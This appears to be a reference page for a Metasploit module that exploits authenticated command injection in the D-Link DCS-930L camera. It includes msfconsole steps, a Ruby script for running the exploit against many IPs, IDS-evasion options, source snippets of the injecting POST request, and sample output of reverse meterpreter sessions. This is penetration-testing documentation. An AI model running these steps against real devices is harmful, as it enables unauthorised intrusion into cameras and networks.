D-Link DCS-930L Authenticated Remote Command Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: D-Link DCS-930L Authenticated Remote Command Execution
Module: exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
Source code: modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb
Disclosure date: 2015-12-20
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https, telnet
Target network port(s): 23, 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

The D-Link DCS-930L Network Video Camera is vulnerable to OS Command Injection via the web interface. The vulnerability exists at /setSystemCommand, which is accessible with credentials. This vulnerability was present in firmware version 2.01 and fixed by 2.12.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using dlink_dcs_930l_authenticated_remote_command_execution against a single host

Normally, you can use exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution this way:

msf > use exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
msf exploit(dlink_dcs_930l_authenticated_remote_command_execution) > show targets
    ... a list of targets ...
msf exploit(dlink_dcs_930l_authenticated_remote_command_execution) > set TARGET target-id
msf exploit(dlink_dcs_930l_authenticated_remote_command_execution) > show options
    ... show and set options ...
msf exploit(dlink_dcs_930l_authenticated_remote_command_execution) > exploit

Using dlink_dcs_930l_authenticated_remote_command_execution against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your dlink_dcs_930l_authenticated_remote_command_execution will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/dlink_dcs_930l_authenticated_remote_command_execution exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution

[*] Using configured payload cmd/unix/interact
msf6 exploit(linux/http/dlink_dcs_930l_authenticated_remote_command_execution) > show info

       Name: D-Link DCS-930L Authenticated Remote Command Execution
     Module: exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-12-20

Provided by:
  Nicholas Starke <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  HttpPassword                   no        Password to login with
  HttpUsername  admin            yes       User to login with
  PASSWORD                       no        The password for the specified username
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80               yes       The target port (TCP)
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                       no        The username to authenticate as
  VHOST                          no        HTTP server virtual host

Payload information:

Description:
  The D-Link DCS-930L Network Video Camera is vulnerable to OS Command 
  Injection via the web interface. The vulnerability exists at 
  /setSystemCommand, which is accessible with credentials. This 
  vulnerability was present in firmware version 2.01 and fixed by 
  2.12.

Module Options


This is a complete list of options available in the linux/http/dlink_dcs_930l_authenticated_remote_command_execution exploit:

msf6 exploit(linux/http/dlink_dcs_930l_authenticated_remote_command_execution) > show options

Module options (exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        Password to login with
   HttpUsername  admin            yes       User to login with
   PASSWORD                       no        The password for the specified username
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME                       no        The username to authenticate as
   VHOST                          no        HTTP server virtual host

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/dlink_dcs_930l_authenticated_remote_command_execution exploit:

msf6 exploit(linux/http/dlink_dcs_930l_authenticated_remote_command_execution) > show advanced

Module advanced options (exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CHOST                                                                       no        The local client address
   CPORT                                                                       no        The local client port
   ConnectTimeout          10                                                  yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   SSLCipher                                                                   no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER                                                no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TelnetBannerTimeout     25                                                  yes       The number of seconds to wait for the initial banner
   TelnetTimeout           10                                                  yes       The number of seconds to wait for a reply from a Telnet Command
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/interact):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/dlink_dcs_930l_authenticated_remote_command_execution module can exploit:

msf6 exploit(linux/http/dlink_dcs_930l_authenticated_remote_command_execution) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/dlink_dcs_930l_authenticated_remote_command_execution exploit:

msf6 exploit(linux/http/dlink_dcs_930l_authenticated_remote_command_execution) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/dlink_dcs_930l_authenticated_remote_command_execution exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/dlink_dcs_930l_authenticated_remote_command_execution) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

79:	      'uri' => '/',
80:	      'method' => 'GET',
81:	      'authorization' => basic_auth(user, pass)
82:	    })
83:	
84:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
85:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200
86:	
87:	    print_good("#{peer} - Successful login #{user} : #{pass}")
88:	  end
89:	

<PEER> - Could not connect to web service - invalid credentials (response code: <RES.CODE>


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - invalid credentials (response code: <RES.CODE>" error message:

80:	      'method' => 'GET',
81:	      'authorization' => basic_auth(user, pass)
82:	    })
83:	
84:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
85:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200
86:	
87:	    print_good("#{peer} - Successful login #{user} : #{pass}")
88:	  end
89:	
90:	  def exploit_telnet

<RHOST>:<TELNET_PORT> - Backdoor service unreachable


Here is a relevant code snippet related to the "<RHOST>:<TELNET_PORT> - Backdoor service unreachable" error message:

99:	    print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...")
100:	    ctx = { 'Msf' => framework, 'MsfExploit' => self }
101:	    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })
102:	
103:	    if sock.nil?
104:	      fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable")
105:	    end
106:	
107:	    add_socket(sock)
108:	
109:	    print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...")

<RHOST>:<TELNET_PORT> - Unable to establish a telnet session


Here is a relevant code snippet related to the "<RHOST>:<TELNET_PORT> - Unable to establish a telnet session" error message:

109:	    print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...")
110:	    prompt = negotiate_telnet(sock)
111:	
112:	    if prompt.nil?
113:	      sock.close
114:	      fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session")
115:	    else
116:	      print_good("#{rhost}:#{telnet_port} - Telnet session successfully established")
117:	    end
118:	
119:	    handler(sock)

ReplyErrorPage


Here is a relevant code snippet related to the "ReplyErrorPage" error message:

126:	      res = send_request_cgi({
127:	        'uri' => uri,
128:	        'method' => 'POST',
129:	        'vars_post' => {
130:	          'ReplySuccessPage' => 'docmd.htm',
131:	          'ReplyErrorPage' => 'docmd.htm',
132:	          'SystemCommand'  => cmd,
133:	          'ConfigSystemCommand' => 'Save'
134:	        }
135:	      })
136:	      return res

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

133:	          'ConfigSystemCommand' => 'Save'
134:	        }
135:	      })
136:	      return res
137:	    rescue ::Rex::ConnectionError
138:	      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
139:	    end
140:	  end
141:	
142:	  def negotiate_telnet(sock)
143:	    begin

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.